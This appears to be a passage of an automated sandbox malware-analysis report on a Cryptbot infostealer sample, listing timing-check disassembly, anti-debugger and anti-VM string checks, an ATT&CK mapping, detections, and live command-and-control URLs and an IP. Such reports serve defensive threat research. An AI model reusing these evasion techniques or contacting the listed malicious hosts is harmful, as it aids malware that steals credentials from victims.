    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79806F1 second address: 7980753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F29FC518EA7h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F29FC518EA4h 0x00000017 sub ah, FFFFFFB8h 0x0000001a jmp 00007F29FC518E9Bh 0x0000001f popfd 0x00000020 pushad 0x00000021 mov al, EFh 0x00000023 push ebx 0x00000024 pop ecx 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F29FC518E9Fh 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980753 second address: 7980759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980C79 second address: 7980C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980C7D second address: 7980C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980C90 second address: 7980CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518EA4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980CA8 second address: 7980CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79D0A32 second address: 79D0A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov dh, B1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 mov eax, 2F4040BBh 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov dh, al 0x0000001a mov bh, D7h 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F29FC518EA7h 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0C6B second address: 79A0C94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F29FC4F369Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0C94 second address: 79A0C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0C98 second address: 79A0CB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CB3 second address: 79A0CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CB9 second address: 79A0CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CBD second address: 79A0CD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov cx, C3AFh 0x0000000f popad 0x00000010 and esp, FFFFFFF0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CD5 second address: 79A0CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CDC second address: 79A0CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CE2 second address: 79A0D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 44h 0x0000000b jmp 00007F29FC4F369Ch 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F29FC4F36A0h 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F29FC4F369Dh 0x0000001e xor eax, 71E47526h 0x00000024 jmp 00007F29FC4F36A1h 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c jmp 00007F29FC4F369Eh 0x00000031 xchg eax, esi 0x00000032 jmp 00007F29FC4F36A0h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov bx, cx 0x0000003e mov edi, esi 0x00000040 popad 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0D5D second address: 79A0DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F29FC518E9Eh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 movzx esi, di 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d mov eax, 367150CDh 0x00000022 movzx ecx, dx 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F29FC518EA0h 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0DAF second address: 79A0E4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F29FC4F36A4h 0x00000013 sub ecx, 14DC0B78h 0x00000019 jmp 00007F29FC4F369Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F29FC4F36A8h 0x00000025 jmp 00007F29FC4F36A5h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp+24h], 00000000h 0x00000034 jmp 00007F29FC4F369Eh 0x00000039 lock bts dword ptr [edi], 00000000h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F29FC4F36A7h 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79E0853 second address: 79E089A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F29FC518E9Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F29FC518EA7h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79E089A second address: 79E08B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F36A4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79E08B2 second address: 79E08B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79D0992 second address: 79D0998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79D0998 second address: 79D099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79E0B4A second address: 79E0B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79E0B59 second address: 79E0BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F29FC518EA1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov bh, cl 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F29FC518EA0h 0x0000001d add cx, BC98h 0x00000022 jmp 00007F29FC518E9Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F29FC518EA8h 0x0000002e jmp 00007F29FC518EA5h 0x00000033 popfd 0x00000034 popad 0x00000035 push dword ptr [ebp+04h] 0x00000038 pushad 0x00000039 popad 0x0000003a push dword ptr [ebp+0Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F29FC518E9Bh 0x00000044 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79E0BF7 second address: 79E0BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: 1359AAC instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: 1359B72 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: 1500C9F instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: 158DA9E instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: 14FF74E instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(3).exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00E39980 rdtsc 3_2_00E39980
    Source: C:\Users\user\Desktop\random(3).exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00C5255D
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,3_2_00C529FF
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00C5255D
    Source: random(3).exe, random(3).exe, 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
    Source: random(3).exeBinary or memory string: Hyper-V RAW
    Source: random(3).exe, 00000003.00000003.1423302788.00000000021BC000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1443794267.00000000021BC000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000003.1422965909.00000000021BC000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000003.1423481945.00000000021BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllname": "KCLOpYZOsHqDeYmlecNW.exe", "pid": 7172 }, { "name": "KCLOpYZOsHqDeYmlecNW.exe", "pid": 7192 }, { "name": "KCLOpYZOsHqDeYmlecNW.exe", "pid": 7216 }, { "name": "KCLOpYZOsHqDeYmlecNW.exe", "pid": 7236 }, { "name": "KCLOpYZOsHqDeYmlecNW.exe", "pid": 7264 }, { "name": "KCLOpYZOsHqDeYmlecNW.exe", "pid": 7284 }, { "name": "KCLOpYZOsHqDeYmlecNW.exe", "pid": 7304 }, { "name": "KCLOpYZOsHqDeYmlecNW.exe", "pid": 7320 }, { "name": "svchost.exe", "pid": 750
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
    Source: random(3).exe, 00000003.00000003.1318522277.0000000007251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?
    Source: random(3).exe, 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\random(3).exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\random(3).exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(3).exeFile opened: NTICE
    Source: C:\Users\user\Desktop\random(3).exeFile opened: SICE
    Source: C:\Users\user\Desktop\random(3).exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\random(3).exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00E39980 rdtsc 3_2_00E39980
    Source: random(3).exe, random(3).exe, 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
    Source: C:\Users\user\Desktop\random(3).exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

    Stealing of Sensitive Information

    barindex
    Yara detected Cryptbot
    Source: Yara matchFile source: Process Memory Space: random(3).exe PID: 7608, type: MEMORYSTR
    Infostealer behavior detected
    Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
    Leaks process information
    Source: global trafficTCP traffic: 192.168.2.7:49708 -> 176.53.146.223:80

    Remote Access Functionality

    barindex
    Yara detected Cryptbot
    Source: Yara matchFile source: Process Memory Space: random(3).exe PID: 7608, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Process Injection    		23
    Virtualization/Sandbox Evasion    		OS Credential Dumping751
    Security Software Discovery    		1
    Exploitation of Remote Services    		11
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory23
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Data from Local System    		4
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager13
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information    		NTDS1
    Remote System Discovery    		Distributed Component Object ModelInput Capture15
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials216
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    random(3).exe50%VirustotalBrowse
    random(3).exe47%ReversingLabsWin32.Infostealer.Tinba
    random(3).exe100%AviraTR/Crypt.TPM.Gen
    random(3).exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00103100%Avira URL Cloudmalware
    KvgPhome.fiveth5vs.top100%Avira URL Cloudmalware
    http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17100%Avira URL Cloudmalware
    http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0100%Avira URL Cloudmalware
    .1.1home.fiveth5vs.top100%Avira URL Cloudmalware
    home.fiveth5vs.top100%Avira URL Cloudmalware
    http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl100%Avira URL Cloudmalware
    http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk173553773735a1100%Avira URL Cloudmalware
    http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    home.fiveth5vs.top
    		176.53.146.223
    		truefalse
      		high
      httpbin.org
      		34.200.57.114
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        KvgPhome.fiveth5vs.toptrue
        • Avira URL Cloud: malware
        		unknown
        http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0true
        • Avira URL Cloud: malware
        		unknown
        home.fiveth5vs.toptrue
        • Avira URL Cloud: malware
        		unknown
        http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737true
        • Avira URL Cloud: malware
        		unknown
        https://httpbin.org/ipfalse
          		high
          .1.1home.fiveth5vs.toptrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlrandom(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdrandom(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#random(3).exefalse
                		high
                http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00103random(3).exe, 00000003.00000002.1443495653.000000000210E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://httpbin.org/ipbeforerandom(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk173553773735a1random(3).exe, 00000003.00000003.1423751958.0000000002132000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://curl.se/docs/http-cookies.htmlrandom(3).exe, random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWlrandom(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://curl.se/docs/hsts.html#random(3).exefalse
                      		high
                      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://curl.se/docs/alt-svc.htmlrandom(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.cssrandom(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://.jpgrandom(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            176.53.146.223
                            		home.fiveth5vs.topUnited Kingdom
                            		35791VANNINVENTURESGBfalse
                            34.200.57.114
                            		httpbin.orgUnited States
                            		14618AMAZON-AESUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1583233
                            Start date and time:2025-01-02 09:14:14 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 47s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:12
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:random(3).exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            176.53.146.223Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
                            joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
                            JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
                            ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
                            34.200.57.114random(5).exeGet hashmaliciousCryptbotBrowse
                              Set-up.exeGet hashmaliciousUnknownBrowse
                                Set-up.exeGet hashmaliciousUnknownBrowse
                                  TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                    joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                      Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                        JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                          r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                            ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              home.fiveth5vs.topPrs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                              • 176.53.146.223
                                              joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                              • 176.53.146.223
